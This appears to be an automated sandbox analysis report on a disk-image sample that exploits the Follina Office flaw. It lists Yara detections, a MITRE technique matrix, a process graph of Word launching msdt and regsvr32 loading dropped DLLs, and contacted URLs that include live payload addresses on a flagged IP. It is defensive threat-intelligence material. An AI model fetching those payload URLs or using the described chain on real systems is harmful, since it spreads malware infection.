                          Source: Yara matchFile source: 38.2.regsvr32.exe.4990000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a80000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.4810000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.0.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.4810000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580442594.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000000.351550985.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.797056780.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580400049.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.582578490.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.582736314.0000000004810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Yara detected CryptOne packer
                          Source: Yara matchFile source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts1
                          Command and Scripting Interpreter                          		1
                          LSASS Driver                          		111
                          Process Injection                          		11
                          Masquerading                          		1
                          Credential API Hooking                          		1
                          System Time Discovery                          		Remote Services1
                          Credential API Hooking                          		Exfiltration Over Other Network Medium1
                          Encrypted Channel                          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default Accounts3
                          Native API                          		1
                          DLL Side-Loading                          		1
                          LSASS Driver                          		1
                          Disable or Modify Tools                          		LSASS Memory1
                          Query Registry                          		Remote Desktop Protocol1
                          Archive Collected Data                          		Exfiltration Over Bluetooth11
                          Ingress Tool Transfer                          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts1
                          Exploitation for Client Execution                          		Logon Script (Windows)1
                          DLL Side-Loading                          		31
                          Virtualization/Sandbox Evasion                          		Security Account Manager2
                          Security Software Discovery                          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                          Non-Application Layer Protocol                          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                          Process Injection                          		NTDS31
                          Virtualization/Sandbox Evasion                          		Distributed Component Object ModelInput CaptureScheduled Transfer21
                          Application Layer Protocol                          		SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                          Obfuscated Files or Information                          		LSA Secrets2
                          Process Discovery                          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.common1
                          DLL Side-Loading                          		Cached Domain Credentials1
                          Application Window Discovery                          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                          Remote System Discovery                          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                          File and Directory Discovery                          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow16
                          System Information Discovery                          		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 640918 Sample: 68101181_048154.img Startdate: 07/06/2022 Architecture: WINDOWS Score: 84 50 Snort IDS alert for network traffic 2->50 52 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->52 54 Yara detected CryptOne packer 2->54 56 2 other signatures 2->56 6 WINWORD.EXE 2->6         started        10 regsvr32.exe 2->10         started        13 regsvr32.exe 2->13         started        15 7 other processes 2->15 process3 dnsIp4 48 185.234.247.119, 49761, 49762, 49780 INTERKONEKT-ASPL Russian Federation 6->48 36 C:\Users\user\AppData\Local\...\123[1].RES, HTML 6->36 dropped 38 C:\Users\user\AppData\Local\...7589548.htm, HTML 6->38 dropped 40 C:\Users\user\AppData\Local\...\AEF9D296.htm, HTML 6->40 dropped 17 msdt.exe 6->17         started        20 MSOSYNC.EXE 6->20         started        22 MSOSYNC.EXE 6->22         started        58 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 10->58 60 Maps a DLL or memory area into another process 10->60 42 C:\Users\user\AppData\Local\...\mj2renji.dll, PE32 15->42 dropped 44 C:\Users\user\AppData\Local\...\ej5ypzxn.dll, PE32 15->44 dropped 46 C:\Users\user\AppData\Local\...\343kkfih.dll, PE32 15->46 dropped 24 powershell.exe 36 15->24         started        26 conhost.exe 15->26         started        28 cvtres.exe 15->28         started        30 2 other processes 15->30 file5 signatures6 process7 file8 32 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 17->32 dropped 34 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 17->34 dropped

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          No Antivirus matches

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll0%MetadefenderBrowse
                          C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll0%ReversingLabs
                          C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
                          C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui0%ReversingLabs

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          38.2.regsvr32.exe.49b0000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                          38.2.regsvr32.exe.400000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                          39.2.regsvr32.exe.ed0000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                          40.2.regsvr32.exe.d80000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                          24.0.explorer.exe.8b0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                          40.2.regsvr32.exe.4810000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                          24.2.explorer.exe.8b0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                          39.2.regsvr32.exe.4aa0000.3.unpack100%AviraHEUR/AGEN.1234562Download File

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://roaming.edog.0%URL Reputationsafe
                          https://cdn.entity.0%URL Reputationsafe
                          https://powerlift.acompli.net0%URL Reputationsafe
                          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                          https://cortana.ai0%URL Reputationsafe
                          https://api.aadrm.com/0%URL Reputationsafe
                          https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
                          http://185.234.247.119/1240405476.dat0%Avira URL Cloudsafe
                          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                          http://www.borland.com/namespaces/TypesAr10%Avira URL Cloudsafe
                          https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                          http://www.borland.com/namespaces/Types-IWSDLPublish0%Avira URL Cloudsafe
                          https://store.office.cn/addinstemplate0%URL Reputationsafe
                          http://www.borland.com/namespaces/Types$r0%Avira URL Cloudsafe
                          https://api.aadrm.com0%URL Reputationsafe
                          http://185.234.247.119/123.RES0%Avira URL Cloudsafe
                          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                          https://www.odwebp.svc.ms0%URL Reputationsafe
                          https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                          https://dataservice.o365filtering.com/0%URL Reputationsafe
                          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                          http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish0%URL Reputationsafe
                          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                          https://ncus.contentsync.0%URL Reputationsafe
                          https://apis.live.net/v5.0/0%URL Reputationsafe
                          https://wus2.contentsync.0%URL Reputationsafe
                          http://www.borland.com/namespaces/TypesU0%URL Reputationsafe
                          https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
                          http://www.borland.com/namespaces/Types7r0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://185.234.247.119/1240405476.dattrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.234.247.119/123.REStrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.diagnosticssdf.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                            		high
                            https://login.microsoftonline.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                              		high
                              https://shell.suite.office.com:144387E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                		high
                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types68101181_048154.imgfalse
                                    		high
                                    https://autodiscover-s.outlook.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                      		high
                                      https://roaming.edog.87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                        		high
                                        https://cdn.entity.87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.addins.omex.office.net/appinfo/query87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                          		high
                                          https://clients.config.office.net/user/v1.0/tenantassociationkey87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                            		high
                                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                              		high
                                              https://powerlift.acompli.net87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://rpsticket.partnerservices.getmicrosoftkey.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://lookup.onenote.com/lookup/geolocation/v187E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                		high
                                                https://cortana.ai87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/soap/encoding/vr$regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                    		high
                                                    https://cloudfiles.onenote.com/upload.aspx87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                      		high
                                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                        		high
                                                        https://entitlement.diagnosticssdf.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                          		high
                                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                            		high
                                                            https://api.aadrm.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ofcrecsvcapi-int.azurewebsites.net/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/soap/http68101181_048154.imgfalse
                                                              		high
                                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                		high
                                                                https://api.microsoftstream.com/api/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                  		high
                                                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                    		high
                                                                    https://cr.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                      		high
                                                                      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://portal.office.com/account/?ref=ClientMeControl87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                        		high
                                                                        https://graph.ppe.windows.net87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                          		high
                                                                          https://res.getmicrosoftkey.com/api/redemptionevents87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://powerlift-frontdesk.acompli.net87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://tasks.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                            		high
                                                                            http://www.borland.com/namespaces/TypesAr1regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://officeci.azurewebsites.net/api/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                              		high
                                                                              http://www.borland.com/namespaces/Types-IWSDLPublishregsvr32.exe, 00000028.00000002.580138972.00000000007D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://store.office.cn/addinstemplate87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/soap/encoding/68101181_048154.imgfalse
                                                                                		high
                                                                                http://www.borland.com/namespaces/Types$rregsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://api.aadrm.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                  		high
                                                                                  https://globaldisco.crm.dynamics.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                    		high
                                                                                    https://messaging.engagement.office.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                      		high
                                                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                        		high
                                                                                        https://dev0-api.acompli.net/autodetect87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.odwebp.svc.ms87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://api.diagnosticssdf.office.com/v2/feedback87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                          		high
                                                                                          https://api.powerbi.com/v1.0/myorg/groups87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                            		high
                                                                                            https://web.microsoftstream.com/video/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                              		high
                                                                                              https://api.addins.store.officeppe.com/addinstemplate87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://graph.windows.net87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                		high
                                                                                                https://dataservice.o365filtering.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://officesetup.getmicrosoftkey.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish68101181_048154.imgfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://analysis.windows.net/powerbi/api87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                  		high
                                                                                                  https://prod-global-autodetect.acompli.net/autodetect87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://outlook.office365.com/autodiscover/autodiscover.json87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                    		high
                                                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                      		high
                                                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                        		high
                                                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/wsdl/68101181_048154.imgfalse
                                                                                                            		high
                                                                                                            https://ncus.contentsync.87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                              		high
                                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                		high
                                                                                                                http://weather.service.msn.com/data.aspx87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                  		high
                                                                                                                  https://apis.live.net/v5.0/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/wsdl/mime/68101181_048154.imgfalse
                                                                                                                      		high
                                                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                        		high
                                                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                          		high
                                                                                                                          https://management.azure.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                              		high
                                                                                                                              https://wus2.contentsync.87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://incidents.diagnostics.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                		high
                                                                                                                                https://clients.config.office.net/user/v1.0/ios87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                  		high
                                                                                                                                  http://www.borland.com/namespaces/TypesU68101181_048154.imgfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                    		high
                                                                                                                                    https://o365auditrealtimeingestion.manage.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                      		high
                                                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/68101181_048154.imgfalse
                                                                                                                                          		high
                                                                                                                                          https://api.office.net87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                            		high
                                                                                                                                            https://incidents.diagnosticssdf.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                              		high
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/android/policies87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                		high
                                                                                                                                                https://entitlement.diagnostics.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://substrate.office.com/search/api/v2/init87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://outlook.office.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/soap/68101181_048154.imgfalse
                                                                                                                                                          		high
                                                                                                                                                          https://storage.live.com/clientlogs/uploadlocation87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.borland.com/namespaces/Types7rregsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://outlook.office365.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://webshell.suite.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                                    		high

                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public IPs

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    185.234.247.119
                                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                                    		198004INTERKONEKT-ASPLtrue

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                                    Analysis ID:640918
                                                                                                                                                                    Start date and time: 07/06/202219:19:332022-06-07 19:19:33 +02:00
                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 15m 47s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:light
                                                                                                                                                                    Sample file name:68101181_048154.img
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                    Number of analysed new started processes analysed:41
                                                                                                                                                                    Number of new started drivers analysed:4
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • HDC enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal84.troj.expl.evad.winIMG@27/33@0/1
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    HDC Information:
                                                                                                                                                                    • Successful, ratio: 23.7% (good quality ratio 22.5%)
                                                                                                                                                                    • Quality average: 77.2%
                                                                                                                                                                    • Quality standard deviation: 26.3%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                    • Override analysis time to 240s for rundll32

                                                                                                                                                                    Warnings

                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, backgroundTaskHost.exe, fsdepends.sys, sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, rundll32.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 184.30.21.144, 52.109.88.177, 52.109.76.35
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
